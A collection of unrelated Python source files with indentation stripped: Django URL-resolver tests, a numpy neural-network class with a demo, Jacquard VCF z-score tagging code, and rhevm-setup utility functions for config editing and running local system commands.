self.assertEqual('/other1/inner/37/42/', reverse('nodefault:urlobject-view', args=[37,42], current_app='other-ns1'))
self.assertEqual('/other1/inner/42/37/', reverse('nodefault:urlobject-view', kwargs={'arg1':42, 'arg2':37}, current_app='other-ns1'))
self.assertEqual('/other1/inner/+%5C$*/', reverse('nodefault:urlobject-special-view', current_app='other-ns1'))
def test_special_chars_namespace(self):
self.assertEqual('/+%5C$*/included/normal/', reverse('special:inc-normal-view'))
self.assertEqual('/+%5C$*/included/normal/37/42/', reverse('special:inc-normal-view', args=[37,42]))
self.assertEqual('/+%5C$*/included/normal/42/37/', reverse('special:inc-normal-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/+%5C$*/included/+%5C$*/', reverse('special:inc-special-view'))
def test_namespaces_with_variables(self):
"Namespace prefixes can capture variables: see #15900"
self.assertEqual('/inc70/', reverse('inc-ns5:inner-nothing', kwargs={'outer': '70'}))
self.assertEqual('/inc78/extra/foobar/', reverse('inc-ns5:inner-extra', kwargs={'outer':'78', 'extra':'foobar'}))
self.assertEqual('/inc70/', reverse('inc-ns5:inner-nothing', args=['70']))
self.assertEqual('/inc78/extra/foobar/', reverse('inc-ns5:inner-extra', args=['78','foobar']))
class RequestURLconfTests(TestCase):
def setUp(self):
self.root_urlconf = settings.ROOT_URLCONF
self.middleware_classes = settings.MIDDLEWARE_CLASSES
settings.ROOT_URLCONF = urlconf_outer.__name__
def tearDown(self):
settings.ROOT_URLCONF = self.root_urlconf
settings.MIDDLEWARE_CLASSES = self.middleware_classes
def test_urlconf(self):
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, 'outer:/test/me/,'
'inner:/inner_urlconf/second_test/')
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 404)
def test_urlconf_overridden(self):
settings.MIDDLEWARE_CLASSES += (
'%s.ChangeURLconfMiddleware' % middleware.__name__,
)
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 404)
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 404)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, 'outer:,inner:/second_test/')
def test_urlconf_overridden_with_null(self):
settings.MIDDLEWARE_CLASSES += (
'%s.NullChangeURLconfMiddleware' % middleware.__name__,
)
self.assertRaises(ImproperlyConfigured, self.client.get, '/test/me/')
class ErrorHandlerResolutionTests(TestCase):
"""Tests for handler404 and handler500"""
def setUp(self):
from django.core.urlresolvers import RegexURLResolver
urlconf = 'regressiontests.urlpatterns_reverse.urls_error_handlers'
urlconf_callables = 'regressiontests.urlpatterns_reverse.urls_error_handlers_callables'
self.resolver = RegexURLResolver(r'^$', urlconf)
self.callable_resolver = RegexURLResolver(r'^$', urlconf_callables)
def test_named_handlers(self):
from .views import empty_view
handler = (empty_view, {})
self.assertEqual(self.resolver.resolve404(), handler)
self.assertEqual(self.resolver.resolve500(), handler)
def test_callable_handers(self):
from .views import empty_view
handler = (empty_view, {})
self.assertEqual(self.callable_resolver.resolve404(), handler)
self.assertEqual(self.callable_resolver.resolve500(), handler)
class DefaultErrorHandlerTests(TestCase):
urls = 'regressiontests.urlpatterns_reverse.urls_without_full_import'
def test_default_handler(self):
"If the urls.py doesn't specify handlers, the defaults are used"
try:
response = self.client.get('/test/')
self.assertEqual(response.status_code, 404)
except AttributeError:
self.fail("Shouldn't get an AttributeError due to undefined 404 handler")
try:
self.assertRaises(ValueError, self.client.get, '/bad_view/')
except AttributeError:
self.fail("Shouldn't get an AttributeError due to undefined 500 handler")
class NoRootUrlConfTests(TestCase):
"""Tests for handler404 and handler500 if urlconf is None"""
urls = None
def test_no_handler_exception(self):
self.assertRaises(ImproperlyConfigured, self.client.get, '/test/me/')
class ResolverMatchTests(TestCase):
urls = 'regressiontests.urlpatterns_reverse.namespace_urls'
def test_urlpattern_resolve(self):
for path, name, app_name, namespace, func, args, kwargs in resolve_test_data:
# Test legacy support for extracting "function, args, kwargs"
match_func, match_args, match_kwargs = resolve(path)
self.assertEqual(match_func, func)
self.assertEqual(match_args, args)
self.assertEqual(match_kwargs, kwargs)
# Test ResolverMatch capabilities.
match = resolve(path)
self.assertEqual(match.__class__, ResolverMatch)
self.assertEqual(match.url_name, name)
self.assertEqual(match.args, args)
self.assertEqual(match.kwargs, kwargs)
self.assertEqual(match.app_name, app_name)
self.assertEqual(match.namespace, namespace)
self.assertEqual(match.func, func)
# ... and for legacy purposes:
self.assertEqual(match[0], func)
self.assertEqual(match[1], args)
self.assertEqual(match[2], kwargs)
class ErroneousViewTests(TestCase):
urls = 'regressiontests.urlpatterns_reverse.erroneous_urls'
def test_erroneous_resolve(self):
self.assertRaises(ImportError, self.client.get, '/erroneous_inner/')
self.assertRaises(ImportError, self.client.get, '/erroneous_outer/')
self.assertRaises(ViewDoesNotExist, self.client.get, '/missing_inner/')
self.assertRaises(ViewDoesNotExist, self.client.get, '/missing_outer/')
self.assertRaises(ViewDoesNotExist, self.client.get, '/uncallable/')
|
|
import numpy as np
import NeuralNetworkUtilities as utilities
class BaseLayer(object):
def __init__(self, n_nodes, activation, knockout_survial=None):
# the number of nodes for this layer...
self.n_nodes = n_nodes
self.n_input_edges = None
# the upstream layer, used for backpropagation...
self.upstream_layer = None
# non-linear activation function for each node...
if activation in ['logistic', 'tanh', 'ReLU', 'LReLU']:
if activation == 'logistic':
self.func = utilities.logistic
self.dfdz_func = utilities.dfdz_logistic
elif activation == 'tanh':
self.func = utilities.tanh
self.dfdz_func = utilities.dfdz_tanh
elif activation == 'ReLU':
self.func = utilities.ReLU
self.dfdz_func = utilities.dfdz_ReLU
elif activation == 'LReLU':
self.func = utilities.LReLU
self.dfdz_func = utilities.dfdz_LReLU
else:
raise RuntimeError('%s not supported activation func' % activation)
# survial rate for node values...
self.knockout_survial = knockout_survial
# learning rate for gradient decent...
self.learning_rate = None
# number of data sets in the training set...
self.n_data_sets = None
# parameters for each layer, i.e. vectorized for each node in layer
self.W = None
self.b = None
self.A = None
self.Z = None
# filter for knockout regularization...
self.F = None
self.dW = None
self.db = None
self.dA = None
self.dZ = None
def initialize_layer(self, n_input_edges, n_data_sets, learning_rate, scalar=0.01):
self.n_input_edges = n_input_edges
self.n_data_sets = n_data_sets
self.learning_rate = learning_rate
self.W = np.random.randn(self.n_nodes, self.n_input_edges)
self.b = np.zeros((self.n_nodes, 1))
def set_upstream_layer(self, layer):
self.upstream_layer = layer
def calculate_Z(self):
pass
def calculate_A(self, prediction):
self.A = self.func(self.Z)
if self.knockout_survial and not prediction:
self.F = np.random.random(size=(self.n_nodes, self.n_data_sets))
self.F = self.F < self.knockout_survial
self.A = np.multiply(self.A, self.F) / self.knockout_survial
def calculate_gradients(self):
pass
def update_parameters(self, eta=None):
self.W -= self.learning_rate * self.dW
if eta:
self.W = (1.0 - eta) * self.W
self.b -= self.learning_rate * self.db
class InputLayer(BaseLayer):
def __init__(self, n_nodes, activation, knockout_survial=None):
super(InputLayer, self).__init__(n_nodes, activation, knockout_survial)
def calculate_Z(self, X):
self.Z = np.dot(self.W, X) + self.b
def calculate_gradients(self, X):
self.dZ = np.multiply(self.dA, self.dfdz_func(self.Z))
self.dW = np.dot(self.dZ, X.transpose()) / self.n_data_sets
# inner product with unity matrix is a sum over the rows (n,m) to (n,1)
self.db = np.sum(self.dZ, axis=1, keepdims=True) / self.n_data_sets
class HiddenLayer(BaseLayer):
def __init__(self, n_nodes, activation, knockout_survial=None):
super(HiddenLayer, self).__init__(n_nodes, activation)
def calculate_Z(self):
self.Z = np.dot(self.W, self.upstream_layer.A) + self.b
def calculate_gradients(self):
self.dZ = np.multiply(self.dA, self.dfdz_func(self.Z))
self.dW = np.dot(self.dZ, self.upstream_layer.A.transpose()) / self.n_data_sets
# inner product with unity matrix is a sum over the rows (n,m) to (n,1)
self.db = np.sum(self.dZ, axis=1, keepdims=True) / self.n_data_sets
# inject the dA parameter into the upstream layer...
self.upstream_layer.dA = np.dot(self.W.transpose(), self.dZ)
class LogisticOutputLayer(BaseLayer):
def __init__(self):
super(LogisticOutputLayer, self).__init__(1, 'logistic')
def calculate_Z(self):
self.Z = np.dot(self.W, self.upstream_layer.A) + self.b
def calculate_gradients(self, Y):
self.dA = -1.0 * (np.divide(Y, self.A) - np.divide((1 - Y), (1 - self.A)))
self.dZ = np.multiply(self.dA, self.dfdz_func(self.Z))
self.dW = np.dot(self.dZ, self.upstream_layer.A.transpose()) / self.n_data_sets
# inner product with unity matrix is a sum over the rows (n,m) to (n,1)
self.db = np.sum(self.dZ, axis=1, keepdims=True) / self.n_data_sets
# inject the dA parameter into the upstream layer...
self.upstream_layer.dA = np.dot(self.W.transpose(), self.dZ)
class ArtificialNeuralNetwork(object):
def __init__(self, L2=None):
self.is_configured = False
self.L2 = L2
self.learning_rate = None
self.layers = []
self.history = []
def add_layer(self, layer):
self.layers.append(layer)
def fit(self, X, Y, n_iter=1000, learning_rate=0.01):
self.learning_rate = learning_rate
if not self.is_configured:
self._configure_layers(X)
self.is_configured = True
for i in range(n_iter):
self._feed_forward(X, prediction=False)
self._calculate_cost(Y)
self._backprop(X, Y)
def predict(self, X):
n, m = X.shape
self._feed_forward(X, prediction=True)
return (self.layers[-1].A > 0.5).reshape(1, m)
def error(self, X, Y):
P = self.predict(X)
return np.mean(P - Y)
def _configure_layers(self, X):
n, m = X.shape
for i, layer in enumerate(self.layers):
if isinstance(layer, InputLayer):
layer.initialize_layer(n, m, self.learning_rate)
else:
upstream = self.layers[i-1]
layer.initialize_layer(upstream.n_nodes, m, self.learning_rate)
layer.set_upstream_layer(upstream)
def _feed_forward(self, X, prediction):
for i, layer in enumerate(self.layers):
if isinstance(layer, InputLayer):
layer.calculate_Z(X)
else:
layer.calculate_Z()
layer.calculate_A(prediction)
def _calculate_cost(self, Y):
A = self.layers[-1].A
n, m = Y.shape
cost = np.sum(np.multiply(Y, np.log(A)))\
+ np.sum(np.multiply((1-Y), (np.log(1-A))))
self.history.append(-1.0 * cost / m)
def _backprop(self, X, Y):
for i, layer in enumerate(reversed(self.layers)):
if isinstance(layer, LogisticOutputLayer):
layer.calculate_gradients(Y)
elif isinstance(layer, InputLayer):
layer.calculate_gradients(X)
elif isinstance(layer, HiddenLayer):
layer.calculate_gradients()
for layer in self.layers:
layer.update_parameters(self.L2)
if __name__ == '__main__':
import classifier_utilities as clf_utils
import matplotlib.pyplot as plt
## generate data
d, m = 2, 1000
X = np.random.randn(d, m)
Y = (np.sqrt(np.square(X[0]) + np.square(X[1])) > 1.0).reshape(1, m)
i = np.squeeze(Y)
## show data
plt.figure()
plt.plot(X[0][i], X[1][i], 'ob')
plt.plot(X[0][~i], X[1][~i], 'or')
# plt.show()
## create ANN...
ann = ArtificialNeuralNetwork(L2=0.0)
ann.add_layer(InputLayer(n_nodes=3, activation='tanh', knockout_survial=1.0))
ann.add_layer(LogisticOutputLayer())
ann.fit(X, Y, learning_rate=0.05, n_iter=9000)
print 'training error: ', ann.error(X, Y)
## show results
clf_utils.plot_gradient_descent_history(ann, display=False)
clf_utils.plot_2D_decision_boundary(ann, X, Y, display=True)
|
|
"""Classes to summarize zscore data for a sample-variant.
A collection of individual Tag classes hold the metaheader and logic to
transform Jacquard-standardized VcfRecords.
These transforms combine info from a single sample-variant tag with aggregate
info about all sample-variants in the VCF. For example, the zscore of a
sample-variant depth is:
(my_depth - average of all depths) / stddev of all depths
For this reason, zscore values require the full VCF as one of the inputs.
"""
from __future__ import print_function, absolute_import, division
import math
import jacquard.utils.utils as utils
import jacquard.variant_caller_transforms.common_tags as common_tags
_JQ_SUMMARY_TAG = "JQ_SUMMARY_"
SUMMARY_TAG = "SUMMARY"
SUMMARY_ALLELE_FREQ_ZSCORE = common_tags.TagType("AF_ZSCORE", "Float", "1")
SUMMARY_DEPTH_ZSCORE = common_tags.TagType("DP_ZSCORE", "Float", "1")
#TODO: (cgates): Define tag ids as public, class-level constants so dependent
# tags can reference them directly
class _AlleleFreqZScoreTag(common_tags.AbstractJacquardTag):
#TODO: (jebene) change the way allelefreqzscore understands the tags
#it's dependent on (_range_tag should not be defined here)
_RANGE_TAG = "{0}AF_RANGE".format(_JQ_SUMMARY_TAG)
def __init__(self, vcf_reader):
super(self.__class__,
self).__init__(SUMMARY_TAG,
SUMMARY_ALLELE_FREQ_ZSCORE,
('Concordance of reported allele frequencies '
'across callers: [(this AF range - mean AF range)'
'/standard dev(all AF ranges)]. Values with null '
'or missing AF range will be assigned zscore of '
'\'.\'; for multi-valued ranges, zscore is of '
'largest range.'))
self.tag = _ZScoreTag(self.tag_id,
self.metaheader,
self._RANGE_TAG,
vcf_reader)
@property
def metaheaders(self):
return self.tag.metaheaders
def add_tag_values(self, vcf_record):
self.tag.add_tag_values(vcf_record)
class _DepthZScoreTag(common_tags.AbstractJacquardTag):
#TODO: (jebene) change the way depthzscore understands the tags
#it's dependent on (_range_tag should not be defined here)
_RANGE_TAG = "{0}DP_RANGE".format(_JQ_SUMMARY_TAG)
def __init__(self, vcf_reader):
super(self.__class__,
self).__init__(SUMMARY_TAG,
SUMMARY_DEPTH_ZSCORE,
('Concordance of reported depth across callers: '
'[(this DP range - mean DP range)/standard '
'dev(all DP ranges)]. Values with null or '
'missing DP range will be assigned zscore '
'of \'.\'.'))
self.tag = _ZScoreTag(self.tag_id,
self.metaheader,
self._RANGE_TAG,
vcf_reader)
@property
def metaheaders(self):
return self.tag.metaheaders
def add_tag_values(self, vcf_record):
self.tag.add_tag_values(vcf_record)
class _ZScoreTag(object):
'''Utility tag to add zscore for dependent tag (e.g. depth or allele freq)
Given a dependent tag and a vcf reader, calculates mean and stdev on
construction and then adds zscores for each value.
'''
_EXECUTION_FORMAT = "##jacquard.summarize.{0}.{1}_{2}={3}"
_MAX_PRECISION = 13
def __init__(self,
tag_id,
metaheader,
dependent_tag_id,
vcf_reader):
self._tag_id = tag_id
self._dependent_tag_id = dependent_tag_id
self._mean, self._stdev = self._init_population_stats(vcf_reader,
dependent_tag_id)
self._metaheaders = self._init_metaheaders(tag_id,
metaheader,
dependent_tag_id,
self._mean,
self._stdev)
def _init_metaheaders(self,
tag_id,
metaheader,
dependent_tag_id,
mean,
stdev):
#pylint: disable=too-many-arguments
metaheaders = []
metaheaders.append(self._EXECUTION_FORMAT.format(tag_id,
dependent_tag_id,
"mean",
repr(mean)))
metaheaders.append(self._EXECUTION_FORMAT.format(tag_id,
dependent_tag_id,
"stdev",
repr(stdev)))
metaheaders.append(metaheader)
return tuple(metaheaders)
@property
def metaheaders(self):
return self._metaheaders
def _ok_to_add_tag_values(self, vcf_record):
return self._stdev and self._dependent_tag_id in vcf_record.format_tags
@staticmethod
def _zscore_as_str(zscore):
if zscore == ".":
return zscore
else:
return utils.round_digits(repr(zscore))
def add_tag_values(self, vcf_record):
if not self._ok_to_add_tag_values(vcf_record):
return
sample_values = {}
for sample_name in vcf_record.sample_tag_values:
zscore = "."
tag_values = vcf_record.sample_tag_values[sample_name]
value = self._get_dependent_value(tag_values,
self._dependent_tag_id)
if value is not None:
zscore = (value - self._mean) / self._stdev
sample_values[sample_name] = self._zscore_as_str(zscore)
vcf_record.add_sample_tag_value(self._tag_id,
sample_values)
@staticmethod
def _get_dependent_value(tag_values, dependent_tag_id):
'''Extract (float) value of dependent tag or None if absent.'''
try:
values = tag_values[dependent_tag_id].split(",")
return max([float(value) for value in values])
except KeyError:
return None
except ValueError:
return None
def _init_population_stats(self, vcf_reader, dependent_tag_id):
'''Derive mean and stdev.
Adapted from online variance algorithm from Knuth, The Art of Computer
Programming, volume 2
Returns: mean and stdev when len(values) > 1, otherwise (None, None)
Values rounded to _MAX_PRECISION to ameliorate discrepancies between
python versions.'''
#pylint: disable=invalid-name
n = 0
mean = 0
M2 = 0
try:
vcf_reader.open()
for vcf_record in vcf_reader.vcf_records():
for tag_values in vcf_record.sample_tag_values.values():
value = self._get_dependent_value(tag_values,
dependent_tag_id)
if value is not None:
n += 1
delta = value - mean
mean += delta / n
M2 += delta * (value - mean)
finally:
vcf_reader.close()
mean = round(mean, self._MAX_PRECISION)
stdev = 0
if n == 0:
mean = None
stdev = None
elif n >= 2:
variance = M2/n
stdev = round(math.sqrt(variance), self._MAX_PRECISION)
return mean, stdev
class ZScoreCaller(object):
"""Provides metaheaders for VcfReader; adds summary tags to VcfRecords."""
def __init__(self, vcf_reader):
self._tags = [_AlleleFreqZScoreTag(vcf_reader),
_DepthZScoreTag(vcf_reader)]
self._metaheaders = self._init_metaheaders(self._tags)
@staticmethod
def _init_metaheaders(tags):
metaheaders = []
for tag in tags:
metaheaders.extend(tag.metaheaders)
return tuple(metaheaders)
@property
def metaheaders(self):
return self._metaheaders
def add_tags(self, vcf_record):
for tag in self._tags:
tag.add_tag_values(vcf_record)
return vcf_record.text()
|
|
"""
contains all common and re-usable code for rhevm-setup and sub packages
"""
import grp
import pwd
import logging
import subprocess
import re
import output_messages
import traceback
import os
import basedefs
import datetime
import libxml2
import types
import shutil
import time
import tempfile
"""
ENUM implementation for python (from the vdsm team)
usage:
#define
enum = Enum(Key1=1, Key2=2)
#use
type = enum.Key1
print type => (prints 1)
# reverse lookup
print enum[2] => (prints Key2)
# value lookup
print enum.parse("Key1") => (prints 1)
"""
class Enum(object):
"""
A nice class to handle Enums gracefullly.
"""
def __init__(self, **pairs):
#Generate reverse dict
self._reverse = dict([(b, a) for a, b in pairs.iteritems()])
#Generate attributes
for key, value in pairs.iteritems():
setattr(self, key, value)
def __getitem__(self, index):
return self._reverse[index]
def __iter__(self):
return self._reverse.itervalues()
def parse(self, value):
#If value is enum name convert to value
if isinstance(value, str):
if hasattr(self, value):
return getattr(self, value)
#If value is a number assume parsing meant converting the value to int
#if you can think of a more generic way feel free to change
if value.isdigit():
value = int(value)
#If not check if value is a value of the enum
if value in self._reverse:
return value
#Enum doesn't know this value
raise ValueError(output_messages.ERR_EXP_VALUE_ERR%(value))
class ConfigFileHandler:
def __init__(self, filepath):
self.filepath = filepath
def open(self):
pass
def close(self):
pass
def editParams(self, paramsDict):
pass
def delParams(self, paramsDict):
pass
class TextConfigFileHandler(ConfigFileHandler):
def __init__(self, filepath, sep="="):
ConfigFileHandler.__init__(self, filepath)
self.data = []
self.sep = sep
def open(self):
fd = file(self.filepath)
self.data = fd.readlines()
fd.close()
def close(self):
fd = file(self.filepath, 'w')
for line in self.data:
fd.write(line)
fd.close()
def getParam(self, param):
value = None
for line in self.data:
if not re.match("\s*#", line):
found = re.match("\s*%s\s*\%s\s*(.+)$" % (param, self.sep), line)
if found:
value = found.group(1)
return value
def editParam(self, param, value):
changed = False
for i, line in enumerate(self.data[:]):
if not re.match("\s*#", line):
if re.match("\s*%s"%(param), line):
self.data[i] = "%s%s%s\n"%(param, self.sep, value)
changed = True
break
if not changed:
self.data.append("%s%s%s\n"%(param, self.sep, value))
def editLine(self, regexp, newLine, failOnError=False, errMsg=output_messages.ERR_FAILURE):
changed = False
for i, line in enumerate(self.data[:]):
if not re.match("\s*#", line):
if re.match(regexp, line):
self.data[i] = newLine
changed = True
break
if not changed:
if failOnError:
raise Exception(errMsg)
else:
logging.warn(errMsg)
def delParams(self, paramsDict):
pass
class XMLConfigFileHandler(ConfigFileHandler):
def __init__(self, filepath):
ConfigFileHandler.__init__(self, filepath)
self.content = []
def open(self):
with open(self.filepath, 'r') as f:
self.content = f.readlines()
libxml2.keepBlanksDefault(0)
self.doc = libxml2.parseFile(self.filepath)
self.ctxt = self.doc.xpathNewContext()
def close(self):
self.doc.saveFormatFile(self.filepath,1)
self.doc.freeDoc()
self.ctxt.xpathFreeContext()
def xpathEval(self, xpath):
return self.ctxt.xpathEval(xpath)
def registerNs(self, nsPrefix, uri):
return self.ctxt.xpathRegisterNs(nsPrefix, uri)
def getNs(self, ns):
for line in self.content:
# Match line includes xmlns=NS:X:X
match = re.match("(.*)xmlns=\"(%s:\d\.\d*)(.*)" % (ns), line)
if match:
return match.group(2)
raise Exception(output_messages.ERR_EXP_UPD_XML_FILE % self.filepath)
def editParams(self, paramsDict):
editAllOkFlag = True
if type(paramsDict) != types.DictType:
raise Exception(output_messages.ERR_EXP_ILLG_PARAM_TYPE)
for key in paramsDict.iterkeys():
editOkFlag = False
nodeList = self.ctxt.xpathEval(key)
if len(nodeList) == 1:
nodeList[0].setContent(paramsDict[key])
editOkFlag = True
elif len(nodeList) == 0:
parentNode = os.path.dirname(key)
parentNodeList = self.ctxt.xpathEval(parentNode)
if len(parentNodeList) == 1:
newNode = libxml2.newNode(os.path.basename(key))
newNode.setContent(paramsDict[key])
parentNodeList[0].addChild(newNode)
editOkFlag = True
if not editOkFlag:
logging.error("Failed editing %s" %(key))
editAllOkFlag = False
if not editAllOkFlag:
return -1
def delParams(self, paramsDict):
pass
def removeNodes(self, xpath):
nodes = self.xpathEval(xpath)
#delete the node
for node in nodes:
node.unlinkNode()
node.freeNode()
def addNodes(self, xpath, xml):
"""
Add a given xml into a specific point specified by the given xpath path into the xml object
xml can be either a libxml2 instance or a string which contains a valid xml
"""
parentNode = self.xpathEval(xpath)[0]
if not parentNode:
raise Exception(output_messages.ERR_EXP_UPD_XML_CONTENT%(xpath, len(parentNode)))
if isinstance(xml, str):
newNode = libxml2.parseDoc(xml)
elif isinstance(xml, libxml2.xmlDoc):
newNode = xml
else:
raise Exception(output_messages.ERR_EXP_UNKN_XML_OBJ)
# Call xpathEval to strip the metadata string from the top of the new xml node
parentNode.addChild(newNode.xpathEval('/*')[0])
def getXmlNode(xml, xpath):
nodes = xml.xpathEval(xpath)
if len(nodes) != 1:
raise Exception(output_messages.ERR_EXP_UPD_XML_CONTENT%(xpath, len(nodes)))
return nodes[0]
def setXmlContent(xml, xpath,content):
node = xml.xpathEval(xpath)
if len(node) == 0:
parentNode = xml.xpathEval(os.path.dirname(xpath))
if len(parentNode) == 1:
parentNode[0].newChild(None, os.path.basename(xpath), content)
else:
raise Exception(output_messages.ERR_EXP_UPD_XML_CONTENT%(xpath, len(parentNode)))
elif len(xml.xpathEval(xpath)) == 1:
node = getXmlNode(xml, xpath)
node.setContent(content)
else:
raise Exception(output_messages.ERR_EXP_UPD_XML_CONTENT%(xpath, len(node)))
def getColoredText (text, color):
''' gets text string and color
and returns a colored text.
the color values are RED/BLUE/GREEN/YELLOW
everytime we color a text, we need to disable
the color at the end of it, for that
we use the NO_COLOR chars.
'''
return color + text + basedefs.NO_COLOR
def isTcpPortOpen(port):
"""
checks using lsof that a given tcp port is not open
and being listened upon.
if port is open, returns the process name & pid that use it
"""
answer = False
process = False
pid = False
logging.debug("Checking if TCP port %s is open by any process" % port)
cmd = [
basedefs.EXEC_LSOF,
"-i", "-n", "-P",
]
output, rc = execCmd(cmdList=cmd, failOnError=True, msg=output_messages.ERR_EXP_LSOF)
#regex catches:
#java 17564 jboss 90u IPv4 1251444 0t0 TCP *:3873 (LISTEN)
pattern=re.compile("^(\w+)\s+(\d+)\s+.+TCP\s\*\:(%s)\s\(LISTEN\)$" % (port))
list = output.split("\n")
for line in list:
result = re.match(pattern, line)
if result:
process = result.group(1)
pid = result.group(2)
answer = True
logging.debug("TCP port %s is open by process %s, PID %s" % (port, process, pid))
return (answer, process, pid)
def execCmd(cmdList, cwd=None, failOnError=False, msg=output_messages.ERR_RC_CODE, maskList=[], useShell=False, usePipeFiles=False):
"""
Run external shell command with 'shell=false'
receives a list of arguments for command line execution
"""
# All items in the list needs to be strings, otherwise the subprocess will fail
cmd = [str(item) for item in cmdList]
# We need to join cmd list into one string so we can look for passwords in it and mask them
logCmd = _maskString((' '.join(cmd)), maskList)
logging.debug("Executing command --> '%s'"%(logCmd))
stdErrFD = subprocess.PIPE
stdOutFD = subprocess.PIPE
stdInFD = subprocess.PIPE
if usePipeFiles:
(stdErrFD, stdErrFile) = tempfile.mkstemp(dir="/tmp")
(stdOutFD, stdOutFile) = tempfile.mkstemp(dir="/tmp")
(stdInFD, stdInFile) = tempfile.mkstemp(dir="/tmp")
# We use close_fds to close any file descriptors we have so it won't be copied to forked childs
proc = subprocess.Popen(cmd, stdout=stdOutFD,
stderr=stdErrFD, stdin=stdInFD, cwd=cwd, shell=useShell, close_fds=True)
out, err = proc.communicate()
if usePipeFiles:
with open(stdErrFile, 'r') as f:
err = f.read()
os.remove(stdErrFile)
with open(stdOutFile, 'r') as f:
out = f.read()
os.remove(stdOutFile)
os.remove(stdInFile)
logging.debug("output = %s"%(out))
logging.debug("stderr = %s"%(err))
logging.debug("retcode = %s"%(proc.returncode))
output = out + err
if failOnError and proc.returncode != 0:
raise Exception(msg)
return ("".join(output.splitlines(True)), proc.returncode)
def execSqlCommand(userName, dbName, sqlQuery, failOnError=False, errMsg=output_messages.ERR_SQL_CODE):
logging.debug("running sql query \'%s\' on db." % sqlQuery)
cmd = [
basedefs.EXEC_PSQL,
"-U", userName,
"-d", dbName,
"-c", sqlQuery,
]
return execCmd(cmdList=cmd, failOnError=failOnError, msg=errMsg)
#TODO: refactor this and previous functions into same execution.
def execRemoteSqlCommand(userName, dbHost, dbPort, dbName, sqlQuery, failOnError=False, errMsg=output_messages.ERR_SQL_CODE):
logging.debug("running sql query '%s' on db server: \'%s\'." % (sqlQuery, dbHost))
cmd = [
basedefs.EXEC_PSQL,
"-h", dbHost,
"-p", dbPort,
"-U", userName,
"-d", dbName,
"-c", sqlQuery,
]
return execCmd(cmdList=cmd, failOnError=failOnError, msg=errMsg)
def replaceWithLink(target, link):
"""
replace link with a symbolic link to source
if link does not exist, simply create the link
"""
try:
#TODO: export create symlink to utils and reuse in all rhevm-setup
if os.path.exists(link):
if os.path.islink(link):
logging.debug("removing link %s" % link)
os.unlink(link)
elif os.path.isdir(link):
#remove dir using shutil.rmtree
logging.debug("removing directory %s" % link)
shutil.rmtree(link)
else:
logging.debug("removing file %s" % link)
os.remove(link)
logging.debug("Linking %s to %s" % (target, link))
os.symlink(target, link)
except:
logging.error(traceback.format_exc())
raise
def getUsernameId(username):
return pwd.getpwnam(username)[2]
def getGroupId(groupName):
return grp.getgrnam(groupName)[2]
def findAndReplace(path, oldstr, newstr):
regex = '(%s)'%(oldstr)
p = re.compile(regex)
try:
# Read file content
fd = file(path)
fileText = fd.readlines()
fd.close()
# Change content
fd = file(path, 'w')
for line in fileText:
line = p.sub(newstr, line)
fd.write(line)
fd.close()
except:
logging.error(traceback.format_exc())
raise Exception(output_messages.ERR_EXP_FIND_AND_REPLACE%(path))
def byLength(word1, word2):
"""
Compars two strings by their length
Returns:
Negative if word2 > word1
Positive if word1 > word2
Zero if word1 == word 2
"""
return len(word1) - len(word2)
def nslookup(address):
cmd = [
basedefs.EXEC_NSLOOKUP, address,
]
#since nslookup will return 0 no matter what, the RC is irrelevant
output, rc = execCmd(cmdList=cmd)
return output
def getConfiguredIps():
try:
iplist=set()
cmd = [
basedefs.EXEC_IP, "addr",
]
output, rc = execCmd(cmdList=cmd, failOnError=True, msg=output_messages.ERR_EXP_GET_CFG_IPS_CODES)
ipaddrPattern=re.compile('\s+inet (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}).+')
list=output.splitlines()
for line in list:
foundIp = ipaddrPattern.search(line)
if foundIp:
if foundIp.group(1) != "127.0.0.1":
ipAddr = foundIp.group(1)
logging.debug("Found IP Address: %s"%(ipAddr))
iplist.add(ipAddr)
return iplist
except:
logging.error(traceback.format_exc())
raise Exception(output_messages.ERR_EXP_GET_CFG_IPS)
def getCurrentDateTime(isUtc=None):
now = None
if (isUtc is not None):
now = datetime.datetime.utcnow()
else:
now = datetime.datetime.now()
return now.strftime("%Y_%m_%d_%H_%M_%S")
def verifyStringFormat(str, matchRegex):
'''
Verify that the string given matches the matchRegex.
for example:
string: 111-222
matchRegex: \d{3}-\d{3}
this will return true since the string matches the regex
'''
pattern = re.compile(matchRegex)
result = re.match(pattern, str)
if result == None:
return False
else:
return True
def getAvailableSpace(path):
logging.debug("Checking available space on %s" % (path))
stat = os.statvfs(path)
#block size * available blocks = available space in bytes, we devide by
#1024 ^ 2 in order to get the size in megabytes
availableSpace = (stat.f_bsize * stat.f_bavail) / pow(1024, 2)
logging.debug("Available space on %s is %s" % (path, availableSpace))
return int(availableSpace)
def transformUnits(size):
""" Transform the number of size param (received in MB)
into an appropriate units string (MB/GB)"""
if size > 1024:
return "%.02f" % (float(size) / 1024.0) + " Gb"
else:
return str(size) + " Mb"
def compareStrIgnoreCase(str1, str2):
''' compare 2 strings and ignore case
if one of the input is not str (bool for e.g) - return normal comapre
'''
if type(str1) == types.StringType and type(str2) == types.StringType:
return str1.lower() == str2.lower()
else:
return str1 == str2
def parseStrRegex(string, regex, errMsg):
"""
Gets a text string and a regex pattern
and returns the extracted sub-string
captured.
"""
rePattern = re.compile(regex)
found = rePattern.search(string)
if found:
match = found.group(1)
logging.debug("found new parsed string: %s"%(match))
return match
else:
raise Exception(errMsg)
def copyFile(filename, destination, uid=-1, gid=-1, filemod=-1):
"""
copy filename to
the destDir path
give the target file uid:gid ownership
and file mod
filename - full path to src file (not directories!)
destination - full path to target dir or filename
uid - integer with user id (default -1 leaves the original uid)
gid - integer with group id (default -1 leaves the original gid)
filemod - integer with file mode (default -1 keeps original mode)
"""
# If the source is a directory, throw an exception since this func handles only files
if (os.path.isdir(filename)):
raise Exception(output_messages.ERR_SOURCE_DIR_NOT_SUPPORTED)
# In case the src file is a symbolic link, we'll get the origin filename
fileSrc = os.path.realpath(filename)
# In default, assume the destination is a file
targetFile = destination
# Copy file to destination
shutil.copy2(fileSrc, destination)
logging.debug("successfully copied file %s to target destination %s"%(fileSrc, destination))
# Get the file basename, if the destination is a directory
if (os.path.isdir(destination)):
